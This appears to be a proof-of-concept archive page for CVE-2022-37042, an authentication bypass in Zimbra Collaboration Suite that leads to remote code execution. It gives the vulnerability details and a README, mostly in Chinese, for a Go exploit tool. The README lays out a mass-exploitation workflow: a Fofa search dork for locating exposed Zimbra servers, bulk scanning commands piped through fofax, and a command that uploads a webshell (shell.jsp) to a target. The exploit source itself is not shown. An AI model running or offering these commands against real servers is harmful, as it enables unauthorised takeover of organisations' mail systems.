Associated Vulnerability
Title:Zimbra Collaboration Suite 路径遍历漏洞 (CVE-2022-37042)Description:Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.
Description
CVE-2022-37042 Zimbra Auth Bypass leads to RCE
Readme
# CVE-2022-37042
## Usage
查看漏洞信息。
```bash
go run main.go -s
_______ ________ ___ ____ ___ ___ ______________ __ __ ___
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ |__ /__ / __ \/ // /|__ \
/ / | | / / __/________/ // / / /_/ /__/ /_____ /_ < / / / / / // /___/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/__/ / / / /_/ /__ __/ __/
\____/ |___/_____/ /____/\____/____/____/ /____/ /_/\____/ /_/ /____/
@_0xf4n9x_
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] VulnInfo:
{
"Name": "CVE-2022-37042 Zimbra Auth Bypass leads to RCE",
"VulID": [
"CVE-2022-37042"
],
"Version": "1.0",
"Author": "0xf9",
"VulDate": "2022-10-07",
"References": [
"https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
"https://nvd.nist.gov/vuln/detail/CVE-2022-37042"
],
"AppName": "Zimbra",
"AppPowerLink": "https://www.zimbra.com/",
"AppVersion": "Zimbra Collaboration Suite 8.8.15 and 9.0",
"VulType": "RCE",
"Description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.",
"Category": "REMOTE",
"Dork": {
"Fofa": "app=\"zimbra-邮件系统\" \u0026\u0026 (protocol=\"http\" || protocol=\"https\")",
"Quake": "",
"Zoomeye": "",
"Shodan": ""
}
}
```
对单个目标URL进行漏洞检测。
```bash
go run main.go -u http://example.com
```
```bash
echo 'http://example.com' | go run main.go
```
对多个目标进行批量漏洞验证。
```bash
go run main.go -l urls.txt
```
```bash
echo 'app="zimbra-邮件系统" && (protocol="http" || protocol="https")' | fofax -ffi -fs 500 | go run main.go
```
对单个目标进行漏洞利用,上传webshell文件。
```bash
go run main.go -u http://example.com -uf shell.jsp
```
## References
https://github.com/projectdiscovery/nuclei-templates/pull/5134
https://github.com/zer0yu
File Snapshot
[4.0K] /data/pocs/0769fb20391d7915f7ad90c1b62738e9f7dbe9d1
├── [ 473] go.mod
├── [4.0K] go.sum
├── [ 12K] main.go
├── [2.3K] README.md
└── [ 545] shell.jsp
0 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →